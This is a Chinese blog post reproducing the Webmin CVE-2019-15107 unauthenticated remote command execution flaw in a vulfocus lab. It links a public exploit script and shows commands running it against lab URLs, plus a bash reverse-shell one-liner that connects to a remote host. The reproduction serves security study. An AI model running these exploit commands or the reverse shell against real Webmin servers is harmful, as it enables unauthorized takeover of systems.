webmin 远程命令执行 (CVE-2019-15107)复现

本文详细介绍了Webmin的一个严重漏洞CVE-2019-15107,该漏洞允许攻击者在未授权的情况下执行任意命令。漏洞影响Webmin版本小于等于1.920。通过发送特定的POST请求,攻击者可以触发命令执行,包括反弹shell。为修复此漏洞,建议升级到Webmin的最新版本。


所有文章,仅供安全研究与学习之用,后果自负!

前言

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。

webmin 远程命令执行 (CVE-2019-15107)

0x01 漏洞描述

Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。

0x02 影响范围

Webmin <= 1.920

0x03 漏洞复现

(1)访问靶场
在这里插入图片描述
要求使用https访问
(2)
在这里插入图片描述

(3)脚本利用
python2 运行

https://github.com/jas502n/CVE-2019-15107

命令执行

python CVE_2019_15107.py https://vulfocus.fofa.so:16241 "ls /tmp"

在这里插入图片描述
id

 python CVE_2019_15107.py https://vulfocus.fofa.so:20763 "id"

在这里插入图片描述

反弹shell

bash -c "bash -i >& /dev/tcp/x.x.x.x/8888 0>&1"

用bpurl编码

在这里插入图片描述

python2 CVE_2019_15107.py  https://vulfocus.fofa.so:26004 "编码后的命令"

脚本执行情况如下
在这里插入图片描述

反弹shell成功

在这里插入图片描述

0x04 漏洞修复

升级到最新版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值